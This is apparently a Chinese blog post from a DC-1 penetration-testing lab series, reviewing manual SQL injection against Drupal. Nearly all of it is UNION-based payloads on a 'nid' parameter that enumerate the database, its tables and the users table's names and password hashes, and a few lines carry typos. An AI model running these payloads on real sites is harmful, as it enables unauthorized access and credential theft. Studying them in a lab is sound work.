drupla SQL手工注入复习

最新推荐文章于 2022-10-17 10:21:24 发布

火中的冰~

最新推荐文章于 2022-10-17 10:21:24 发布

阅读量140

点赞数

分类专栏： DC-1-9通关秘籍渗透测试

本文链接：https://blog.csdn.net/qq_42094992/article/details/109104797

版权

渗透测试同时被 2 个专栏收录

52 篇文章 8 订阅

订阅专栏

DC-1-9通关秘籍

10 篇文章 0 订阅

订阅专栏

判断列数

?nid=1 order by 1 --+` 

?nid=1 order by 1 --+      错误

程序中SQL语句有两列

判断显示位

?nid=0 union select 1`

数据库名字

?nid=0 union select database()

数据库版本

?nid=0 union select version()

列表名

?nid=0 union select table_name from information_schema.tables where table_schema=database()        列表明

?nid=0 union select group_concat(table_name) from information_schema.tables where table_schema=database()      使用group_concat 拼接字符串显示内容

?nid=0 union select table_name from information_schema.tables where table_schema=database() limi 0,1     
?nid=0 union select table_name from information_schema.tables where table_schema=database() limi 1,1    使用limit按次序查询表名

列users表中字段

?nid=0 union select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()

列字段内容

?nid=0  union select group_concat(name) from users 
?nid=0  union select group_concat(pass) from users

火中的冰~

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
drupla SQL手工注入复习

判断列数?nid=1 order by 1 --+` ?nid=1 order by 1 --+ 错误程序中SQL语句有两列判断显示位?nid=0 union select 1`数据库名字?nid=0 union select database()数据库版本?nid=0 union select version()列表名?nid=0 union select table_name from information_schema.
复制链接

扫一扫